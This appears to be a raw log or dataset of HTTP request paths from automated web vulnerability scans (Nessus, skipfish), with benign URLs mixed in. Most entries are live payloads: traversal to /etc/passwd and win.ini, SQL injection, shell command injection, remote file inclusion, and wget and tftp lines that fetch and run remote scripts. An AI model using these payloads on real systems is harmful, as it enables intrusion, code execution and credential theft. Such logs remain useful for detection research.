/en-us/account/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /ovcgi/openview5.exe /cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 /javascript/~bin.exe /scriptpath/index.php?page=http://192.168.202.96:8080/vir0v3xfc? /next week's forecast/ /m2fpztty.jspa? /scripts/qbch5ojumj32.cgi /sunshop.index.php?action=storenew&username= /scgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd /examples/jsp/jsp2/jspx/help.php?section='qualiteam_xcart_sql_xss.nasl //./../../../../../../../.windows/win.ini /help.php?q="rm,q35488415&rem, /examples/jsp/sessions/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /cgi-bin/www/delivery/ac.php?bannerid=-1332008323+or+1=1+--+';passthru(base64_decode($_server[http_nessus_xdid48fb]));die;/* /examples/servlets/servlet/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00 /zuihld5m.dll? /exchange/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og /scripts/myevent.php?myevent_path=/etc/passwd\x00 /5o9zq43e.idc? /rv98iwjp.exe? /vac1l5vm.asp? /main.php?stuff="\x0asleep 8 # /javascript/sponsor.exe /examples/jsp/error/index.php?_language=../../../../../../../../../../etc/passwd\x00 /iajtej82.aspx? /examples/jsp/jsp2/jspx/docs.php?doc=../jpgraph-1.12.1/docs/index /fpnpp5zg.cfm? /articles/default.asp?ichannel=duportal_sql_injections2.nasl'&nchannel=articles /main.php?stuff="del\xa0q67484693&rem\xa0 /.kspx /scriptlogic-securecopy/ /profile.asp?handle=foo' /en-us/ddoworrl.do? /cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349 //q59551631&q2217"q2217q59551631 /examples/jsp/cal/config.php?path[docroot]=/etc/passwd\x00 /dda2qr7j.idc? /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=5gwkphbixv0nj8yq0 /help.php?q='&uname\x09# /awstats/awstats.pl?migrate=|echo;echo x;echo|awstats606038.txt /javascript/apache.exe /en-us/fo564rei.do? /scripts/k0pxpjgnimox.sh /169okeyj.exe? /scripts/lom_update.php?etcdir=http://192.168.202.118:8080/ghl9il? /opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00 /examples/jsp/cal/pals-cgi?palsaction=restart&documentname=/etc/passwd /javascript/document.tmp /examples/jsp/jsp2/el/index.php?p='nessus /javascript/dynamic.exe /help.php?q=&ver >q55151681&rem /cgi-bin/base_qry_common.php?base_path=/etc/passwd\x00 /examples/jsp/cal/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js /main.php?logout="ping,-w,7000,-n,1,1.2.3.4&rem, /lmw4r201.nsf? /../../windows/dvr2.ini /javascript/ecommerce.exe /qb2xy9aw.exe? /uc3w3bdi.php? /vjbrrppi.php? /82q7ywa8.fts? /vmi8bb12.idc? /javascript/corrections.exe /scripts/b0j2ijssh6cu.sh /applescript-implementors/ /phpmyadmin/queryframe.php?lang=en-iso-8859-1&server=1&hash=">=' /help.php?q="uname\x09>q18952146\x09# /zqqemp6j.php3? /scgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /xsqln7eb.dll? /ny1b3qq4.cfc? /scripts/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00 /floridian\'s/ /cialis-prescription/ /transcription/ /...\...\...\...\...\...\...\...\...\windows\win.ini /ht8pn8uq.php? /virus_descriptions/ /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908853 /eei78ore.jspa? /examples/jsp/cal/ion-p.exe?page=c:\\winnt\\win.ini /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332010419,4--&blog=1 /recordings/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc /m2fpztty.cgi? /main.php?stuff="&ver\x09>q95679894&rem\x09 /women's-issues/ /wps/wcm/webinterface/login/login.jsp?"> /cgi-bin/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null -- /en-us/n9xlumt5.htm? /subscriptions.pem /noscript/ /help.php?q=del;q21957336&rem; /recordings/sources/functions.php?root_path=/etc/passwd\x00 /bytehoard/index.php?infolder=../../../../../../../../../../../etc/ /top.php?stuff="&rm\x09q25218299&rem\x09 /main.php?stuff="\x0duname\x09>q27469451\x09# /cgi-bin/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null-- /javascript/webb.exe /htsearch?exclude=`/etc/passwd` /javascript/.passwd.fcgi /javascript/.passwd.config /user.php?uname=1&module=ns-lostpassword&op= /t3af3tdz.do? /en-us/esmozg5d.cfc? /3j8echh0.x? /examples/jsp/num/tinybrowser/upload.php?badfiles=1> /top.php?stuff='\x0asleep 8 # /q703m78q.x? /0w155a7c.cfm? /esmozg5d.kspx? /javascript/.htpasswd.sfish/sfish%nd%nd%nd%nd%nd%nd%nd%nd /javascript/cgi-bin.exe /d44uk9h2.mscgi? /examples/jsp/checkbox/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /scgi-bin/ppdscgi.exe /main.php?frm_daynight=day&frm_passwd=&frm_referer=q16493987&frm_user=&scr_height=&scr_width= /examples/jsp/sessions/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /auth2-passwd/ /scripts/wsisa.dll/wservice=anything?wsmadmin /edzaia0i.fts? /raanw4ia.idc? /egaet53a.do? /scripts/wd7crx47eaml.asp /htbin/pfdispaly.cgi?../../../../../../../../../../etc/passwd /en-us/.cfm /catalog.php?action=category_show&id=' /uvazfs7p.jspa? /xsqln7eb.html? /rbec2ohx.jsp? /phpmyadmin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435 /scripts/pajax/pajax_call_dispatcher.php /javascript/javax.exe /help.php?q=ver\xa0>q77554152&rem\xa0 /en-us/w4996nr0.cfc? /mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz? /help.php?q="ver\x0b>q14893241&rem\x0b /5qnlm5z2.exe? /fcgi-bin/htimage.exe/path/filename?2,2 /top.php?stuff="&del q19468613&rem /manager/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /b1q8bywu.php? /javascript/alerts.exe /examples/jsp/jsp2/jspx/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /examples/jsp/num/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /static//........................................................................../../../../../../../../windows/win.ini /cgi-sys/cgi-test.exe /javascript/null.exe /index.php?op=default&date=200607' union select 1,262566063,1,1,1,1,1,1,1,1--&blogid=1 /pma/export.php?what=../../../../../../../../../../../../etc/passwd\x00 /7uz3ok60.exe? /cgi-bin/img.pl?f=../etc/passwd /6n7aacgg.idc? /0qhcnefz.php3? /cactimultihtml.pl?multi=/etc/passwd\x00html /tim_o'reilly/ /help.php?q="del\x09q14739543&rem\x09 /way-board/way-board.cgi?db=/etc/passwd\x00 /main.php?logout="&ping;-w;7000;-n;1;4.3.2.1&rem; /album/?mode=album&album=../../../../../../../../etc&dispsize=640&start=0 /rpxyx07v.jspa? /scripts/js/scripts.php?load=/boot.ini\x00 /0qhcnefz.cfm? /7dbjwpw6.html? /6dlc2zm9.php? /rpc/..%5c..%5cwinnt/system32/cmd.exe?/c+dir /en-us/33y9gcqq.exe? /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=q58924236&scr_width= /examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00 /javascript/200.exe /javascript/bulk.exe /3j8echh0.cgi? /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd /yef5f3d5.mscgi? /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1\x0acat /etc/passwd /j734qobz.jspa? /phpmyadmin/faq.php?action=&type=view&s=&id=-1' union select 0,478772920,0,0,0,0,0-- /young's_modulus/ /en-us/h5sc3gxy.exe? /cgi-bin/input2.bat?|dir ..\\..\\..\\..\\..\\..\\..\\..\\..\\ /examples/jsp/sessions/starnet/addons/slideshow_full.php?album_name='257169990 /subscription_mag1/ /awstats/awstats.pl?migrate=|echo;echo x;echo|awstats557139.txt / /javascript/conference.exe /manager/review.php?id=1&cat=&subcat="> /recordings/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/fphgokkkuu.sh+>+/dev/null+&'); function v /hjdzm96v.php? /scripts/login.php?course="> /ghswfouu.cfm? /rpxyx07v.aspx? /examples/jsp/jsp2/el/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /whysubscriptions/ /m5103snj.dll? /igtf0zon.dll? /manager/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html /uc3w3bdi.mscgi? /examples/jsp/checkbox/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /cgi-sys/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /help.php?q="sleep\x099\x09# /citizen's guide to animal control/ /main.php?logout=1 '" -- /scs86g1p.idc? /ydexw8by.mscgi? /scripts/samples/details.idc /m4kkjf8l.nsf? /cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919010','5'-- /scripts/base_local_rules.php?dir= /examples/jsp/sessions/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /examples/jsp/jsp2/jspx/sources/functions.php?root_path=/etc/passwd\x00 /odzk29aa.php3? /admin/addentry.php?phpbb_root_path=/etc/passwd\x00 /cgi-home/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /l4fz1dqw.pl? /vwmg565s.php3? /? /top.php?stuff=&ver\xa0>q39815136&rem\xa0 /javascript/templates.exe /pbserver/..\xc0\xaf../..\xc0\xaf../winnt/system32/cmd.exe?/c+dir /examples/jsp/num/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /javascript/mailer.exe /en-us/account/index.php?_language=../../../../../../../../../../etc/passwd\x00 /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- /scripts/ggvfa_wichxq.shtml /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331923201,1,1,1,1,1,1,1--&blogid=1 /main.php?stuff="&del\x09q95679894&rem\x09 /clonazepam-prescription/ /examples/jsp/error/protection.php?action=logout&siteurl=/etc/passwd /zqqemp6j.kspx? /scripts/cart32.exe /course_descriptions/ /htbin/vssetcookie.exe /script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/ghl9il?? /examples/jsp/jsp2/jspx/showproduct.php?product=1' /main.php?stuff=;del\x09q56931967\x09# /examples/jsp/sessions/ion-p.exe?page=../../../../../etc/passwd /examples/jsp/jsp2/jspx/ion-p.exe?page=c:\\winnt\\win.ini /hrttz9fj.dll? /top.php?stuff="rm;q63898211&rem; /script/gestion/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz? /javascript/.htpasswd.sfish/.sf/ /javascript/cgi-bin2.exe /examples/servlets/servlet/supporter/tupdate.php?groupid=change&sg=' /hjdzm96v.cfc? /en-us/account/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00 /phpmyadmin/data/fetch.php?page=' /cgi-bin/admin/addentry.php?phpbb_root_path=/etc/passwd\x00 /odzk29aa.fts? /examples/jsp/checkbox/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'-- /examples/jsp/jsp2/el/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt /top.php?stuff="&ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /javascript/htpasswd.pm /index.php?file=..\..\..\..\..\..\..\..\..\..\boot.ini /ny1b3qq4.asp? /apavxugx.x? /javascript/.passwd.gif /vjbrrppi.nsf? /html/cgi-bin/cgicso?query= /recordings/webplus?script=/../../../../etc/passwd /u95h6ymu.dll? /examples/jsp/num/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl /vjbrrppi.php3? /eg2u8pbv.kspx? /examples/jsp/sessions/pals-cgi?palsaction=restart&documentname=/etc/passwd /en-us/i686v90l.pl? /jw64yq8u.php? /fo564rei.jsp? /vwmg565s.html? /..%2f..%2f..%2f..%2f..%2f../winnt/repair/sam /i7prbs22.kspx? /examples/servlets/servlet/add_url.htm?node= /index.php?src=1&_common=1&time=1332010405&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /scripts/webwho.pl /cgis/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /recordings/config.php?returnpath=/etc/passwd\x00 /transcript_kentbeck050506/ /ywaxntrx.php? /tuwjta1w.asp? /examples/servlets/servlet/index.php?gadget=glossary&action=viewterm&term= /scripts/w04ukbv54ixz.pl /sysuser/docmgr/ieedit.stm?name= /recordings/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /scripts/admin/operators.php?view /phpmyadmin/?"> /top.php?stuff="|ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /scriptpath/footers.php?tinybb_footers=@rfiurl /cgi-local/gwweb.exe?help=bad-request /u95h6ymu.idc? /examples/jsp/sessions/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wkwrzrcc]));die;/* /examples/jsp/num/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00 /j4drbkil.cgi? /xfkun1ku.dll? /tuwjta1w.jspa? /hipscript_newfeatures/ /awstats/awstats.pl?migrate=|echo;wget -p /tmp/ http://192.168.202.102:80/awseggcasxfmpqqk8thttkqywxjaaa/dedvphbiqt.sh;echo|awstats582580.txt /administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/llumt7msyau5y? /course_description/ /javascript/gadgets.exe /en-us/odzk29aa.idc? /s7qus4g3.jspa? /usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/moclyxlwqyfjnp??cmd=id;pwd /examples/jsp/colors/forumdisplay.php?fid=21"> /cacti/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl /scripts/n4p4f4gtbhia.pl /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/2aibfaczmac8?? /examples/jsp/jsp2/jspx/base_qry_common.php?base_path=/etc/passwd\x00 /manager/mylog.html?screen=/etc/passwd //

/egaet53a.x? /manager/awstatstotals.php?sort="].phpinfo().exit().$a[" /5qnlm5z2.kspx? /phpmyadmin/../phpmyadmin.dump /xlj7h65o.exe? /egaet53a.aspx? /en-us/account/admin/top.php?admindir=/etc/passwd\x00 /examples/jsp/jsp2/el/auktion.cgi?menue=../../../../../../../../../etc/passwd /subscriptions.nsf /rbec2ohx.pl? /x7pclv4s.dll? /examples/jsp/checkbox/search.cgi?..\..\..\..\..\..\windows\win.ini /check_user_id.php?user_id= /aj3pf49c.html? /javascript/top.exe /82q7ywa8.nsf? /bzuf9ozq.cfc? /help.php?q=ver\x0b>q51627428&rem\x0b /uvazfs7p.x? /en-us/account/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /6qbynt4f.jsp? /15436-hezbollah's global reach/ /wps/wcm/webinterface/login/login.jsp?"> /main.php?stuff='del\x09q85216432\x09# /scripts/index.php?option=frontpage&itemid=2|system(id)|1331908857 /scripts/www/delivery/ac.php?bannerid=-62+or+1=1 /examples/jsp/colors/docs.php?doc=../jpgraph-1.12.1/docs/index /javascript/zips.exe /javascript/foundation.exe /examples/jsp/sessions/edit.jsp?page=user&editor=../../../install / /7dbjwpw6.asp? /examples/jsp/checkbox/index.php?search='>&searchmode=f /main.php?stuff="ver\xa0>q67484693&rem\xa0 /ygkjkngd.x? /examples/jsp/colors/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /d44uk9h2.pl? /examples/jsp/cal/smpwservicescgi.exe /main.php?logout="|ping -w 11000 -n 1 1.2.3.4|rem /cgi-local/a1stats/a1disp4.cgi?../../../../../../../etc/passwd /page.php?action=view&id=1 /cacti/include/sql.php?include_path=/etc/passwd\x00 /pxagj7n7.aspx? /admin/admin.php?sid=0' /swingin-description/ /3m5knyc4.cfm? /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\x00 /scs86g1p.cgi? /recordings/index.php?album=../../../../../../../../../../etc/passwd\x00 /help.php?q='&rm\x09q11888742\x09# /606wkcop.dll? /javascript/inquire.exe /scriptactiv_e/ /mv8wxfy9.aspx? //q59551631&q2217"q2217<q2217>q59551631 /index.php?id=kis0atfdu6' /bxnyrhmh.jspa? /en-us/7o5qp766.php? /pam_passwdqc-1/ /82q7ywa8.php3? /rv98iwjp.cfc? /igtf0zon.htm? /raanw4ia.kspx? /opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/ipb5ri?\x00 /tukodz3j.x? /main.php?stuff=ver,>q79379786&rem, / /8x6w469u.exe? /examples/jsp/sessions/notify?from=nessus"|id" //.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\windows/win.ini /main.php?logout=";rm\x09q86216423\x09# /javascript/terms.exe /script/common.inc.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8? /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,1114321675 -- /javascript/labs.exe /dslpwt15.idc? /7dbjwpw6.asp? /iktok2bw.jsp? /virus_description/ /javascript/test3.exe /en-us/w4996nr0.asp? /jw64yq8u.asp? /9kr0ih0v.htm? /transcript_bykertwins/ /vwmg565s.aspx? / /scripts/og5mz8h.exe?/x+/c+tftp -i 192.168.202.96 get gaone3pg ycqbbdpf.exe /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+2e+74+65+78+74+00+00+00+00+10+00+00+00+10+00+00+00+10+00+00+00++>>ctdn /cgi-914/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /lsoix5h3.jspa? /javascript/cart.exe /7u1pb2xi.mscgi? /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=q59864895&scr_width= /gy23xnjq.fts? /gvx7m5ti.cgi? /en-us/ddoworrl.cfm? /examples/jsp/jsp2/jspx/print.php?what=article&id=' /zqqemp6j.php? /cgi-bin/directory.php?dir=;cat /etc/passwd /cgi-exe/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /scripts/login.php?return=http://www.nessus.org/ /cgi-bin/forumdisplay.php?fid=21"> /fnwhrxyd.kspx? /javascript/htpasswd.jsf /main.php?logout='uname\x09>q76232693\x09# /examples/jsp/checkbox/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /examples/jsp/checkbox/include/theme.inc.php?fullpath=/etc/passwd\x00 /forum-ra.asp?n=../../../../../../../../../etc/passwd /iv5vkgam.do? /jujgxwav.x? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+ff+d0+89+44+24+24+5a+93+e8+10+00+00+00+61+5b+ff+e3+60+33+c0+b0+04+e8+16++>>ctdn /5qnlm5z2.kspx? /script/gestion/index.php?path_inc=http://192.168.202.118:8080/ghl9il? /bn857frh.cfm? /examples/jsp/num/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00 /examples/jsp/error/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00 /examples/jsp/cal/kernel/loadkernel.php?installpath=/etc/passwd\x00 /en-us/oie504mr.cfm? /scripts/fpremadm.exe /scripts/shop.plx/page=nessus938891774 /.passwd /lsoix5h3.kspx? /javascript/ruby.exe /scripts/.%2e/%2e./winnt/system32/cmd.exe?/x+/c+copy \winnt\system32\cmd.exe 8obtsg.exe /nyjgaorz.x? /subscriptions_ttl/ /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null -- /javascript/blog.exe /help.php?q="&del q16957345 # /scripts/i-mall.cgi?p=|id| /scripts/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /rbec2ohx.nsf? /j734qobz.jsp? /javascript/mysqld.exe /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/xdnhmjnjeg0;')."]=1 /help.php?q="\x0drm\x09q14674684\x09# /dslpwt15.jsp? /cgi-914/ion-p?page=../../../../../etc/passwd /examples/jsp/sessions/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /help.php?q='uname\x09# /scripts/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd /main.php?stuff="del;q23861899&rem; /main.php?logout=^' /install.php?newlang=../../cpg_error.log\x00 /.mscgi /examples/jsp/colors/index.php?chemin=../../../../../../..//etc /subscription_new/ /help.php?q="|ping -w 9000 -n 1 4.3.2.1|rem /en-us/esmozg5d.aspx? /examples/jsp/num/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- /0u75ldxq.jsp? /yver8r9o.html? /examples/jsp/jsp2/jspx/nslookup.cgi?query=localhost;id&type=any&ns= /top.php?stuff=";uname\x09>q51581738\x09# /n9xlumt5.pl? /scripts/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /g3w7y7u5.kspx? /nyvbv05h.exe? /default.asp?catid=1234567890' /cgi-win/vssetcookie.exe /main.php?stuff="uname # /7dbjwpw6.jsp? /recordings/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /recordings/backend/classes.php?include_path=../lib/jinzora.js\x00 /examples/servlets/servlet/wikka.php?wakka=homepage/../../actions/wikkachanges /phpmyadmin/../phpmyadmin.7z /miz4r5hz.kspx? /examples/jsp/checkbox/index.php?id='union/**/select/**/0,0,1141767021,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /j734qobz.aspx? /recordings/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org /scripts/password_reminder.php /javascript/outline.exe /ddoworrl.exe? /cacti/survey.inc.php?path=/etc/passwd\x00 /scripts/callboth.php?seq=654321&out=123456&in=1331904443@nessus\x0d\x0aasteridex_in_code_injection.nasl /javascript/uk.exe /en-us/w4996nr0.php3? /examples/jsp/num/admin/top.php?admindir=/etc/passwd\x00 /nslookup.cgi?query=localhost;id&type=any&ns= /scripts/base_local_rules.php?dir= /xfkun1ku.mscgi? /iktok2bw.php3? /scripts/vvh_tajyleqq.cgi /j4oqyvga.do? /scripts/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00 /htbin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /manager/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /nyjgaorz.mscgi? /j4drbkil.php3? /recordings/sawmill6cl.exe?ho+{complete_version} /the world's scariest ghosts - caught on tape/ /scripts/piywzua5hwer.shtml /cgi-bin/passwd /examples/jsp/jsp2/el/secure.php?cfgprogdir=/etc/passwd\x00 /xsqln7eb.pl? /yver8r9o.cfc? /scripts/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl /iktok2bw.cfc? /examples/jsp/num/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /top.php?stuff="rm\x09q22258799\x09# /examples/jsp/checkbox/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /cgi-bin/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../vtigerservice.php\x00 /eg2u8pbv.asp? /iajtej82.kspx? /main.php?logout=&del;q42123677&rem; /ju0u7kfo.exe? /newsubscriptionzip/ /bin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=sgc8xwpexcvugmx5d /help.php?q="rm\x0cq49751234&rem\x0c /examples/jsp/num/index.php?id=' /components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=id /6dlc2zm9.php3? /fo564rei.cfm? /scripts/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}} /phpmyadmin//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd /javascript/soft.exe /n1afe1y6.html? /7dbjwpw6.htm? /javascript/explorer.exe /y8pmygrp.idc? /javascript/external.exe /examples/servlets/servlet/store.php?crn=42'&action=show&show_products_mode=cat_click /javascript/usage.exe /usb_script/ /scripts/callboth.php?seq=654321&out=123456&in=1332010411@nessus\x0d\x0aasteridex_in_code_injection.nasl /j4rdyhw8.php3? /javascript/fs.exe /javascript/htpasswd.bin /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908714',null,null,null,null -- /examples/jsp/errorsearch-results.dot?search_query=nessus">/ /javascript/phtml.exe /7o5qp766.kspx? /cacti/auktion.cgi?menue=../../../../../../../../../etc/passwd /q703m78q.htm? /m4kkjf8l.cfm? /b4vng02k.kspx? /top.php?stuff="&rm\x0cq18822244&rem\x0c /en-us/hipkz026.cfc? /javascript/recycle.exe /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;chmod+555+/tmp/hwxugbkmva;" /scripts/kb.cgi?view='&lang=en /main.php?logout='\x0auname\x09# /cgi-home/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /main.php?stuff="ping;-w;7000;-n;1;4.3.2.1&rem; /hipscriptdocs/ /help.php?q=&ver;>q65325882&rem; /scripts/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini /phpmyadmin/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00 /examples/jsp/cal/awstatstotals.php?sort="].phpinfo().exit().$a[" /0w155a7c.dll? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/dphbymftnm.sh+>+/dev/null+&')."]=1 /en-us/account/styles.php?toroot=/etc/passwd\x00 /tukodz3j.jspa? /cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,49499334,0,0,0,0,0-- /main.php?logout=';uname # /phpmyadmin/catalog.php?action=category_show&id=' /examples/jsp/sessions/listrec.pl?app=qmh-news&template=;ls /etc| /subscriptions.ini /sys/code/box.inc.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt? /.../.../.../.../.../.../.../.../.../winnt/win.ini /examples/servlets/servlet/faq.php?action=&type=view&s=&id=-1' union select 0,385193185,0,0,0,0,0-- /main.php?stuff="rm q53176124&rem /main.php?logout=";uname >q17425978 # /templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/tzhfyzkbomspvm? /htgrep/file=index.html&hdr=/etc/passwd /examples/jsp/num/starnet/addons/slideshow_full.php?album_name='1170870124 /shoutbox.php?conf=../../../../../../../../etc/passwd /main.php?stuff="ping\x0b-w\x0b7000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /examples/jsp/colors/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00 /main.php?stuff="&rm,q75222715&rem, /..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og /javascript/htpasswd.tar /5o9zq43e.dll? /cgi-bin/passwd.txt /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/2aibfaczmac8?\x00 /scripts/security/login /top.php?stuff="ping\xa0-w\xa09000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /169okeyj.jsp? /main.php?stuff="|ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /en-us/hipkz026.jspa? /cgi-local/gw5/gwweb.exe?htmlver=aaa&get-context /8t9v8k7x.x? /cacti/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00 /javascript/subscriber.exe /en-us/9kr0ih0v.idc? /module/forum/forum.php?fd=http://192.168.202.118:8080/moclyxlwqyfjnp?='; /scripts/s_form.cgi /l4fz1dqw.dll? /examples/jsp/jsp2/el/index.php?cat_select= /w4996nr0.htm? /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\" /manager/minis.php?month=../../../../../../etc/passwd /help.php?q=&ver\x0c>q36742672&rem\x0c /169okeyj.jspa? /examples/jsp/sessions/sendtemp.pl?templ=../../../../../etc/passwd /169okeyj.dll? /phpmyadmin/sfi9876.exe /scripts/testcgi.exe /nyvbv05h.cgi? /transcript_smile/ /lmw4r201.htm? 